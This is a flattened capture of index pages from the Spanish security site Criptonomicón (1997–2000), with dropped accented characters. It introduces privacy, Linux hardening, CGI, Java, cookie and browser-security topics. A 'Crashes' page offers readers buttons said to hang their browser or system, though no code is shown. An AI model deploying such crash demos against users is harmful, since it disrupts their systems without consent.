Vous êtes sur la page 1sur 859

Antesala del Criptonomicn

Te sientes observado? Notas unos ojos que siguen todos tus movimientos cuando mueves el ratn?
A veces uno se siente as cuando navega por la Red.
Puedes protegerte. Existen tcnicas para preservar tu privacidad, para asegurar tus secretos, para que
ests a salvo.
Te propongo un viaje por el mundo de la criptografa y la seguridad en Internet.
Quieres acompaarme? Sgueme, abre conmigo las pginas del Criptonomicn.

file:///C|/TEMP/criptonomicon/criptonomicon/index.htm [25/10/2000 02:30:24 p.m.]

Bienvenido al Criptonomicn - Criptografa y Seguridad en Internet


Entre los mejores 60 sitios de
abril

Suscripcin gratis

Tema central en TV en ON/OFF, en Control C y en III Milenio

Boletn del Criptonomicn

Tu e-mail

Suscribir
Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

Internet no es un medio seguro. Desvelamos ms informacin acerca de


nosotros mismos de lo que imaginamos. Somos vctimas fciles de asaltos a
la intimidad como el spam, la suplantacin de identidad o el marketing
personalizado. Cada vez que navegamos, dejamos un rastro fcil de seguir.
Es el fin de la intimidad?

JavaScript

Cookies

Crashes

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Agujeros

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC.
Para informacin sobre privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Para sugerencias, comentarios o quejas, acuda al libro de visitas. Para contribuir al Criptonomicn,
lea la pgina de contribuciones. Infrmese sobre cmo recibir gratis el Boletn del Criptonomicn
en la pgina de suscripcin.

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/default2.html (1 of 2) [25/10/2000 02:30:26 p.m.]

Bienvenido al Criptonomicn - Criptografa y Seguridad en Internet


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/default2.html (2 of 2) [25/10/2000 02:30:26 p.m.]

Pgina de informacin sobre el Boletn del Criptonomicn

Suscripcin gratis

Seguridad

El Boletn del Criptonomicn es una publicacin electrnica (distribuida va e-mail)


completamente gratuita que se recibe una vez cada quince das. A travs de sus
pginas suministro informacin acerca de actualizaciones y cambios en el
Criptonomicn, noticias sobre seguridad y virus, enlaces a buenas pginas sobre
seguridad e intimidad, recomendaciones de libros y de herramientas de seguridad,
consejos y trucos, firmas invitadas de expertos en el mundo de las tecnologas de la
informacin, anuncios de ofertas de trabajo y becas y mucho ms.

Linux

Cmo suscribirse

Intimidad?

Artculos

Navegacin segura

Para suscribirse, introduce tu direccin de email y pulsa el botn de "Suscripcin"


(asegrate dos veces de que es correcta antes de pulsar el botn):

Control de acceso

Suscripcin

CGI

Cmo darse de baja

Java

Para cancelar la suscripcin, introduce tu direccin de email y pulsa el botn de


"Cancelacin" (asegrate dos veces de que es correcta antes de pulsar el botn):

JavaScript

Cancelacin
Cookies

Crashes

Agujeros

Spam

Nmeros atrasados
Que te acabas de suscribir y te gustara leer los boletines anteriores? Ningn
problema, aqu los tienes, ordenados por fecha de publicacin. Eso s, aqu
aparecern algo ms tarde que el boletn distribuido por suscripcin, por lo que
algunas noticias podran quedar desfasadas.
Boletines #1-10 (en formato ZIP)

Boletines #11-20 (en formato ZIP)

Boletines #21-30 (en formato ZIP)

Boletines #31-40 (en formato ZIP)

Boletines #41-50 (en formato ZIP)

Boletines #51-60 (en formato ZIP)

Remailers

Anonimato

Correo seguro

Web seguro

Si quieres ver un boletn determinado, introduce el nmero (desde el 1 al 69) y pulsa


el botn de "Leer":

Susurros desde la Cripta

Nmero del boletn:


file:///C|/TEMP/criptonomicon/criptonomicon/suscripcion.html (1 of 2) [25/10/2000 02:30:26 p.m.]

Pgina de informacin sobre el Boletn del Criptonomicn


Consejos prcticos

Puedo reproducir noticias?


Referencias

Libro de Visitas

Por supuesto. Si posees una pgina Web o un servicio de boletn electrnico o


cualquier otro medio de difusin de informacin, puedes reproducir cualquier noticia
de este boletn, en parte o en su totalidad, siempre que mantengas su forma original e
incluyas un enlace a estas pginas y menciones expresamente de dnde has extrado
esa noticia. Puedes consultar mi pgina de copyright para ms detalles.

Puedo colaborar?
Claro que s. El boletn est abierto a todo aquel que, poseyendo un conocimiento
profundo sobre alguno de los temas habitualmente tratados en este medio, desee
compartir con el resto de lectores sus conocimientos y experiencia. Los interesados
en participar en la seccin Hablan los expertos, pueden remitirme sus trabajos por
correo electrnico.
Asmismo, todos aquellos que queris expresar vuestros comentarios, opiniones y
pareceres sobre cualquier aspecto relacionado con el mundo de la criptografa y de la
seguridad en Internet, podis hacerlo escribindome por correo electrnico, para que
vuestras cartas aparezcan en la seccin Comentarios de los lectores.
Entre todos podemos trabajar por una Internet ms segura.

Firma PGP
Puedes obtener la clave pblica PGP del Criptonomicn para comprobar la firma en
los boletines a partir del nmero 36 inclusive.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/suscripcion.html (2 of 2) [25/10/2000 02:30:26 p.m.]

Est nuestra intimidad amenazada?

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Intimidad?

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

La intimidad es un derecho constitucional del individuo (art. 18, apartados 3 y 4),


que con los medios de comunicacin tradicionales, como el correo postal, correo
certificado, los apartados de correo, etc., estn ms que garantizados. En cambio, con
el uso generalizado de los sistemas de comunicacin electrnicos, la intimidad y el
anonimato de las personas resultan crecientemente amenazadas.
Cada vez que alguien utiliza el correo electrnico, navega por la
Web, interviene en foros de conversacin, participa en los grupos
de noticias de Usenet, o hace uso de un servidor de FTP, est
Tu rastro
revelando datos sensibles acerca de su personalidad, economa,
gustos, hbitos sociales, residencia, etc., que pueden ser
maliciosamente recolectados y utilizados por terceros, en perjuicio
Tu correo
del usuario inocente.
La amenaza ms evidente, de la que todo el mundo es consciente, consiste en los
ataques a la confidencialidad, autenticidad e integridad del correo electrnico. Hoy
da resulta sencillo hacer frente a estos ataques mediante los protocolos de
comunicaciones basados en procedimientos criptogrficos.
En cambio, la mayora de los usuarios no es consciente de la cantidad de informacin
privada que, de forma inadvertida e involuntaria, est revelando a terceros, al hacer
uso de la Internet. Cada vez que se visita un sitio Web, se suministra de forma
rutinaria una informacin que puede ser archivada por el administrador del sitio. A
ste, no le resulta difcil averiguar la direccin de Internet de la mquina desde la que
se est operando (comprubalo), la direccin de correo electrnico del usuario
(comprubalo tambin), qu pginas lee y cules no, qu figuras mira, cuntas
pginas ha visitado (en tu caso pginas), cul fue el sitio recientemente visitado (t
vienes de ) y tambin qu sistema operativo y qu navegador usa (en tu caso ).
No debes de tener Java instalado. Qu aburrido eres!

Web seguro
Nota: En Internet Explorer puede fallar el botn que te dice tu nombre y direccin de mquina. Si aparece localhost/127.0.0.1, es el
nombre y direccin IP asignado a la mquina local.
Susurros desde la Cripta

Con ello se expone a ser vctima de las ltimas plagas que han entrado en la escena

file:///C|/TEMP/criptonomicon/criptonomicon/info.html (1 of 2) [25/10/2000 02:30:27 p.m.]

Est nuestra intimidad amenazada?


Consejos prcticos

Referencias

Libro de Visitas

de las comunicaciones electrnicas: el correo basura (junk-mail o spam), que puede


atiborrar nuestro buzn de correo, empleado por marcas comerciales sin escrpulos o
por aficionados para promocionar indiscriminadamente sus productos por toda la red;
la suplantacin del usuario, para enviar mensajes ofensivos en su nombre a terceros,
que le pueden poner en una situacin incmoda; el marketing personalizado, que
explota informacin que los usuarios van revelando inadvertidamente a medida que
navega por la Red sobre sus gustos y preferencias, etc.
En estas pginas se ofrece una panormica de la problemtica actual asociada al uso
de la Internet. Se describen los riesgos que se corre al revelar involuntariamente
informacin privada, la manera como un tercero puede servirse de sta en forma
incmoda o perjudicial para el usuario y finalmente se describen los medios de
proteccin que se pueden adoptar.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/info.html (2 of 2) [25/10/2000 02:30:27 p.m.]

Hablan los expertos

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Hablan los expertos


Estas pginas recogen los artculos publicados en el Boletn del
Criptonomicn en la seccin Hablan los expertos, que nos brindan la
oportunidad de compartir la opinin y los conocimientos de expertos
nacionales en materia de criptografa y seguridad.
Podrs informarte y formar tu opinin acerca de qu es la criptologa y qu
disciplinas incluye, acerca de los ltimos avances en comercio electrnico y
de las tecnologas que utiliza, acerca de tcnicas de identificacin biomtrica
y sistemas de proteccin de los derechos de autor, acerca de qu son y
cmo evolucionan SSL y SET, acerca de aspectos legales y regulaciones
sobre criptografa, y mucho ms.
Bucea por estas pginas y emppate de los conceptos de criptologa y
seguridad que te permitirn saber qu est pasando en el mundo de las
tecnologas de la informacin en los albores del tercer milenio.
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el
boletn.

Agujeros

Spam
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Remailers

Anonimato

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/index.htm (1 of 2) [25/10/2000 02:30:27 p.m.]

Hablan los expertos


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/index.htm (2 of 2) [25/10/2000 02:30:27 p.m.]

Seguridad en las redes de comunicaciones

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Introduccin

En estas pginas nos centraremos en la seguridad en la


comunicacin a travs de redes, especialmente Internet,
consistente en prevenir, impedir, detectar y corregir violaciones a
la seguridad durante la transmisin de informacin, ms que en la
seguridad en los ordenadores, que abarca la seguridad de sistemas
operativos y bases de datos. Consideraremos la informacin
esencialmente en forma digital y la proteccin se asegurar
mayormente mediante medios lgicos, ms que fsicos.

Amenazas a la
seguridad
Servicios de
seguridad
Mecanismos de
seguridad
Gestin de claves

Navegacin segura

Control de acceso

CGI

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/seguridad.html (1 of 2) [25/10/2000 02:30:27 p.m.]

Seguridad en las redes de comunicaciones


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/seguridad.html (2 of 2) [25/10/2000 02:30:27 p.m.]

Seguridad en Linux

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Pginas desarrolladas en colaboracin con Pedro Pablo Fbrega Martnez

En estas pginas nos centraremos en cmo aumentar la seguridad


en sistemas basados en el sistema operativo Linux. Su gratuidad,
flexibilidad, potencia, apertura, facilidad para obtencin de
herramientas y otras muchas virtudes hacen de Linux la eleccin
cada vez ms frecuente entre los administradores de sistemas a la
hora de decidirse por una u otra plataforma.
Aunque Linux es un sistema muy robusto e incorpora las
caractersticas de seguridad comunes a todos los sistemas tipo
Unix, a pesar de todo resulta fundamental dedicar cierto tiempo y
recursos para conocer cules son sus debilidades y vas frecuentes
de ataque y adoptar posteriorermente las medidas ms eficaces
para contrarrestarlas. A menudo un sistema operativo es tan
seguro como la astucia y habilidad de su administrador.
En estas pginas aprender todo lo necesario para configurar su
red de manera segura, as como indicaciones y referencias donde
profundizar en algunos aspectos de la administracin, auditoras
de seguridad, planes de contingencia, etc.

Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema
de Archivos
Seguridad del Ncleo
Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?
Recursos

Lo primero que tenemos que tener en mente es que no existe nada


como un sistema completamente seguro. Todo lo que puede hacer
es aumentar la dificultad para que alguien pueda comprometer su sistema. En el caso
medio del usuario de Linux en casa, no se requiere demasiado para mantener alejado
al cracker. Para usuarios con grandes requisitos (bancos, compaas de
telecomunicaciones, etc.) se requiere mucho ms trabajo.
Otro factor a tener en cuenta es que cuanto ms incremente la seguridad de su
sistema, ms intrusiva se vuelve la seguridad, en otras palabras, su sistema puede
perder funcionalidad y resentirse la comodidad. Necesita decidir en qu medida su
sistema es utilizable y en qu medida es seguro para sus propsitos. Por ejemplo,
puede necesitar que cualquiera marque a su modem para que ste devuelva la
llamada a su casa. Esto es ms seguro, pero si alguien no est en casa hace ms

file:///C|/TEMP/criptonomicon/criptonomicon/linux/index.htm (1 of 2) [25/10/2000 02:30:28 p.m.]

Seguridad en Linux
Consejos prcticos

Referencias

Libro de Visitas

difcil que se pueda conectar. Tambin puede configurar su sistema Linux sin
conexin a Internet, pero esto dificulta que pueda navegar por las webs. Si tiene un
sitio medio-grande, debera establecer una "Poltica de Seguridad" que indique qu
niveles requiere su sitio y qu medidas de evaluacin se realizan.
Los dos puntos principales de los que se tiene que dar cuenta cuando lea estas
pginas son:
Tenga cuidado con su sistema. Verifique los registros (logs) del sistema, tales
como /var/log/messages y no pierda de vista su sistema.
Tenga su sistema actualizado, estando seguro de que ha instalado las versiones
actuales de los programas y est al tanto de las nuevas alertas de seguridad.
Hacer esto le ayudar a conseguir que su sistema sea mucho ms seguro.
Nota: este documento est basado en parte, pero no es una traduccin literal, del Linux Security
HOWTO, de Kevin Fenzi y Dave Wreski.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/index.htm (2 of 2) [25/10/2000 02:30:28 p.m.]

Las reglas de oro para la navegacin segura

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Obtener un navegador
De todos los servicios que ofrece Internet, como correo
vlido
electrnico, grupos de noticias, canales de charla, transferencia de
ficheros, conexin remota a ordenadores, etc., sin duda alguna el
Configuracin segura de
que mayor crecimiento ha experimentado y mayor popularidad ha Netscape Communicator
cobrado entre los usuarios ha sido la World Wide Web.
Configuracin segura de
Paralelamente y siguiendo el tirn del mercado, el software de
Internet Explorer
navegacin ha ido evolucionando a un ritmo espectacular,
incorporando con cada nueva versin nuevas utilidades y posibilidades en una loca
carrera en la que cada navegador intenta dejar atrs a sus competidores.

Control de acceso

CGI

Java

JavaScript

Cookies

El resultado es que los navegadores consumen cada vez ms recursos y han


terminado por transformarse en herramientas muy voluminosas, inflados con tantas
sutilezas y detalles de funcionamiento que resulta difcil seguir la pista de los nuevos
servicios aadidos. En su interior se ocultan opciones de configuracin de nombres a
menudo crpticos y no pocas veces de oscura finalidad. Por consiguiente, teniendo
presente que la mayor parte del tiempo que un usuario va a emplear conectado a
Internet ser haciendo uso del navegador, nada mejor que conocer todos los detalles
de cmo configurar de manera segura la gran cantidad de caractersticas que
incorporan las ltimas versiones.

Crashes

Agujeros

Spam

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/index.htm (1 of 2) [25/10/2000 02:30:29 p.m.]

Las reglas de oro para la navegacin segura


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/index.htm (2 of 2) [25/10/2000 02:30:29 p.m.]

Cmo restringir el acceso a pginas Web

Suscripcin gratis

Intimidad?

Artculos

Control de acceso

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

A menudo se les presenta a muchos creadores de pginas Web la


necesidad de restringir el acceso a ciertas reas de sus Webs, de
manera que solamente los usuarios autorizados sean capaces de
acceder a esos contenidos privados, bien sea mediante pago, bien
por tratarse de clientes especiales o simplemente de los amiguetes.
En general, la forma de controlar este acceso pasa por modificar
los permisos de los usuarios en el servidor Web (tpico de NT) o
por la creacin de listas de control de acceso en el servidor (tpico
de Unix). Por desgracia, son muchos los creadores que no
disponen de privilegios para garantizar esos permisos ni crear esas
listas en el servidor, por lo que deben buscar caminos alternativos.

Nombres

Localizacin

JavaScript

Java

ASP

CGI

En este curso se explican desde un punto de vista prctico varias


Limitaciones
formas de restringir el acceso a ciertas pginas por medio de Java,
CGI, ASP y JavaScript, por lo tanto, sin necesidad de poseer privilegios especiales en
el servidor, formas todas ellas al alcance de cualquier creador de pginas Web, tiles
en diversas plataformas, Unix o NT, utilizando en todos los casos herramientas
gratuitas y de fcil obtencin.

Agujeros
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Spam

Remailers

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/index.htm (1 of 2) [25/10/2000 02:30:29 p.m.]

Cmo restringir el acceso a pginas Web


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/index.htm (2 of 2) [25/10/2000 02:30:29 p.m.]

Seguridad en CGI

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Seguridad en CGI
Cada vez que rellenamos un formulario y enviamos nuestros datos
o cada vez que utilizamos un buscador para encontrar
informacin, tanto si lo sabemos como si no, estamos haciendo
uso de programas CGI. En esta seccin del Criptonomicn se
describirn las amenazas a que estn expuestos los servidores
Web que incluyen aplicaciones CGI para llevar a cabo funciones
avanzadas de interaccin con el cliente, as como los propios
usuarios, que al enviar informacin posiblemente confidencial,
podran ver violada su intimidad si dicha informacin fuera
capturada por un atacante.

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos
Se describirn a lo largo de estas pginas los riesgos y fallos ms
comunes, suministrndose abundantes consejos y ejemplos de cmo deben escribirse
los CGI y de cmo configurar el servidor para que esta clase de problemas no tenga
lugar.

Crashes

Agujeros

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Spam

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/index.htm (1 of 2) [25/10/2000 02:30:30 p.m.]

Seguridad en CGI
Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/index.htm (2 of 2) [25/10/2000 02:30:30 p.m.]

Seguridad en Java

Suscripcin gratis

Intimidad?

Seguridad en Java
Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Por qu tanto revuelo acerca de la seguridad en Java? Por qu


no se habla con la misma aprensin de seguridad en C o seguridad
en Fortran?
La respuesta no es difcil de entender: los programas en C, por
ejemplo, estn compilados para una arquitectura determinada (un
programa compilado para Unix no funciona en Mac o en
Windows) y es el usuario el que los ejecuta en su ordenador (bien
descargados desde la Red, desde un diskete o un CD-ROM) bajo
su entera responsabilidad y sabiendo cundo los ejecuta.

Qu es Java

Barreras de seguridad

Prohibido

Agujeros

Lneas futuras

Sin embargo, la caracterstica ms atractiva de Java desde el punto Cmo firmar applets
de vista de Internet, sus applets, que se pueden ejecutar en
cualquier plataforma con cualquier sistema operativo, constituyen
Consejos
tambin su taln de Aquiles. Si desde cualquier pgina Web que
visitamos nos pueden enviar una applet que se ejecute en nuestro
Recursos
ordenador sin nuestro conocimiento, todo tipo de ataques podra
tener lugar: esas applets podran cifrar el contenido de nuestro
disco duro y luego su autor pedirnos una suma millonaria por entregarnos la clave;
podran introducirnos virus; podran robar todo tipo de informacin de nuestro
ordenador; podran explotar recursos de nuestro sistema, como ciclos de CPU, y un
largo etctera fcil de imaginar.

Agujeros

Spam

Con el fin de que estos escenarios no fueran posibles, se implement un sistema de


seguridad integrado por cuatro lneas de defensa. A lo largo de estas pginas iremos
describiendo los ataques y las formas de defensa, veremos qu son y cmo se
escriben applets hostiles y cmo protegernos de ellos.

Remailers

Anonimato
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Correo seguro

Web seguro

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/java/index.htm (1 of 2) [25/10/2000 02:30:30 p.m.]

Seguridad en Java
Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/java/index.htm (2 of 2) [25/10/2000 02:30:30 p.m.]

Curso de introduccin a JavaScript

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Introduccin
JavaScript es un lenguaje de programacin desarrollado por
Netscape Corporation para su navegador Netscape Navigator 2.0,
para permitir la ejecucin de cdigo dentro de las pginas en
HTML. Microsoft posee su propia versin para su navegador
Internet Explorer, llamada JScript, pero que, salvo en algunos
detalles generalmente no demasiado importantes, resulta
compatible con los navegadores de Netscape. Gracias a los
programas (llamados guiones) escritos en este lenguaje y
embebidos en las pginas HTML, se pueden conseguir
interesantes efectos en las pginas web, comprobar la validez de la
entrada de formularios, abrir y cerrar ventanas, cambiar
dinmicamente el aspecto y los contenidos de una pgina, clculos
matemticos sencillos y mucho ms.
En este curso se pretende ofrecer una introduccin al lenguaje
JavaScript, que dote a sus lectores del conocimiento y
herramientas necesarios para empezar inmediatamente a utilizar
con eficacia guiones en sus pginas y mejorar as su contenido. Se
ofrecern ejemplos continuamente, junto con su cdigo fuente,
que puede ser tomado como punto de arranque para desarrollar
nuevas aplicaciones. Si desea obtener una gua completa sobre
este lenguaje, se recomienda al lector acudir a la pgina de
Netscape.

Aadir JavaScript a una


pgina

Abrir y cerrar ventanas


Escribir en la ventana
actual

Validar formularios
Cambiar imgenes
dinmicamente

Clculos matemticos

Cookies

La barra de estado

Men de navegacin

Las personas que ya estn familiarizadas con HTML y especialmente con el lenguaje
de programacin C/C++ o Java, no encontrarn ninguna dificultad en seguir estas
lecciones, ya que JavaScript les resultar muy familiar. Se trata de un lenguaje
interpretado por el navegador del usuario que carga una pgina web (no compilado).
Est orientado a objetos, con una serie de limitaciones, cuyo cometido principal es
prevenir que se altere el sistema ficheros del cliente, por lo que no puede leer,
escribir, crear, borrar o listar ficheros (excepto cookies, de las que se hablar ms
adelante). Carece adems de primitivas de red, de manera que no puede establecer
conexin directa con otras mquinas (excepto enviar correo).

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/index.htm (1 of 2) [25/10/2000 02:30:31 p.m.]

Curso de introduccin a JavaScript


Consejos prcticos
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Referencias

Libro de Visitas

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/index.htm (2 of 2) [25/10/2000 02:30:31 p.m.]

Todo sobre las cookies

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

En los ltimos meses las cookies han atrado un inters


considerable en publicaciones sobre temas relacionados con los
ordenadores, la Internet y la seguridad.
A pesar de que los grupos de anunciantes mantienen una guerra
particular con ciertas organizaciones que promueven la intimidad
en la Red, lo cierto es que las cookies continan usndose
extensivamente.

Qu son

Riesgos

Usos

Ejemplos

La mayora de los usuarios ya pueden rechazar a voluntad las


A dieta
cookies desde sus navegadores o bien desde un nmero cada vez
mayor de programas y extensiones al navegador que las bloquean.
Recursos
De esta manera son libres de elegir si prefieren la navegacin con
cookies o sin ellas, de decidir si desean arriesgar su intimidad a
cambio de ciertas comodidades y de una navegacin ms individualizada.
Con el tiempo se ver cul es el destino de las cookies, si caern en el olvido o se
convertirn en estndar aceptado para extender las posibilidades del protocolo HTTP.
Lo ms importante es que entretanto los usuarios de Internet sean informados acerca
de la naturaleza real de las cookies, quines las usan y para qu, y qu riesgo real
suponen para su intimidad. Mientras no surjan estndares al respecto, nada como la
informacin para combatir los miedos irracionales.

Crashes

Agujeros
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Spam

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/index.htm (1 of 2) [25/10/2000 02:30:31 p.m.]

Todo sobre las cookies


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/index.htm (2 of 2) [25/10/2000 02:30:31 p.m.]

Crashes de los navegadores

Suscripcin gratis

Crashes del navegador

Intimidad?

Artculos

Seguridad

Atencin!
Linux

Estas pginas contienen botones y links que, de ser seguidos,


pueden conducir a un bloqueo del navegador o del sistema. Aquel
que ejecute los programas contenidos en esta pgina lo hace
enteramente bajo su responsabilidad. Se recomienda cerrar otros
trabajos que estn abiertos.

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Te gustan los perros? Entonces no te pierdas a este perrito tan mono. Aunque te
advierto que te puede causar problemas. As que casi mejor que no lo visites, mira.
Bueno, t vers.
Este crash en Java se debe a la mente malvola de Joseph Ashwood. Que lo
disfrutes con salud!
Has guardado bien toda la informacin? Mira que podras perderlo todo. Si
no quieres arrepentirte, mejor no juegues con fuego.

Crashes

No veas lo fcil que lo tengo para colgar tu navegador (y si no te das prisa,


tambin tu ordenador). Quieres verlo? Muy fcil, pulsa el botn.
Quiero colgar el navegador

Agujeros

Spam

Te gustara ver otra forma de colgar tu navegador?

Todava se me ocurre otra:

Remailers

Quiero colgarlo otra vez

Anonimato

Como habris podido comprobar, el Netscape es ms robusto a este tipo de


truquillos. Por algo ser (o era) el ms utilizado, no?

Correo seguro

Si os gustan las emociones fuertes, visita la pgina ms insidiosa.

Web seguro

Para usuarios del Explorer

Susurros desde la Cripta

Este crash es demoledor: ventana a frer esprragos.

file:///C|/TEMP/criptonomicon/criptonomicon/crashes/index.htm (1 of 2) [25/10/2000 02:30:31 p.m.]

Crashes de los navegadores


Consejos prcticos

Referencias

Este otro no se queda corto: embeber objetos.

Tampoco est mal el debido a ActiveX.

O el que se debe a JScript.

Libro de Visitas

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/crashes/index.htm (2 of 2) [25/10/2000 02:30:31 p.m.]

Agujeros de seguridad de los navegadores

Suscripcin gratis

Intimidad?

Artculos

Creas que tu navegador es seguro?

Cada da se descubren ms agujeros de seguridad en Internet Explorer.

Anda que el Netscape no est mucho mejor.

Supuestamente Java no puede abrir ventanas sin un aviso, ni puede escanear tu


estructura de directorios, ni manipular threads, pero...

Navegacin segura

Control de acceso

CGI

Sabas que se puede utilizar tu ordenador para realizar clculos sin que t lo
sepas y enviar los resultados a travs de la Internet?
Aprende sobre el "Marcado de Datos" o Data Tainting, incorporado por
